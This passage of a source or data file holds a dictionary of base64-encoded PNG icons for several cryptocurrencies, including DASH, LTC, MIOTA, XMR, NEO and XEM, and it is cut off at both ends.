78PWU3+PzHnd++dXd8bt0vfrbkRLRiSoRXm+7vyC/z718ybGXQWAhyknRT+F1Kea/CZJQtXAAAAAElFTkSuQmCC',
'DASH': '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',
'LTC': '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',
'MIOTA': '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',
'XMR': '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',
'NEO': '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',
'XEM': 'iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAAXNSR0IArs4c6QAAACBjSFJNAAB6JgAAgIQAAPoAAACA6AAAdTAAAOpgAAA6mAAAF3CculE8AAAACXBIWXMAABYlAAAWJQFJUiTwAAABWWlUWHRYTUw6Y29tLmFkb2JlLnhtcAAAAAAAPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iWE1QIENvcmUgNS40LjAiPgogICA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPgogICAgICA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIgogICAgICAgICAgICB4bWxuczp0aWZmPSJodHRwOi8vbnMuYWRvYmUuY29tL3RpZmYvMS4wLyI+CiAgICAgICAgIDx0aWZmOk9yaWVudGF0aW9uPjE8L3RpZmY6T3JpZW50YXRpb24+CiAgICAgIDwvcmRmOkRlc2NyaXB0aW9uPgogICA8L3JkZjpSREY+CjwveDp4bXBtZXRhPgpMwidZAAAIfUlEQVRYCbVWCWxU1xU97/8/Mx6PB6+DN4yNNxbTspRAMOBMQ2gSUqoQYqctQkioRU2pVFQpiYoS4TZto1SNFEJKBCKhjVICmGD2hASo2aGmNotjsAFjjws2XvHYM/bMX17v+7anY4NjWqlXevP/f+++e8+59777BhhdGKnIbkAZXXWIxuAeacjssA9h/GEi5sVGTsMIV/jwVTgPV0S7PB4lvqULToPLlqgIGPGxvDc5Qe8YP1ZtcU7svl9cDC18n5sIlPXbGmJvOABGijIphjavfSEh+d090hwAcwE2m55ZhCuBhiUjHopF4fB2M9zzC6AS7YvyIimycXJUb6Wq4pwjc/K5S8f3VzPGBBkhMo0QsXAAgrGJ7s/FiHp7Y/xST7vyAukWzJvC4xbO1jEjW8XYeA0Oh45Im4EIhXOJLAR0Dk2PZAHDiXpPE0p3AtsqgWwy2ETLPqAyETiY9exLO85+vvMWTQsx/Q0CMD+enjsm7lqt5S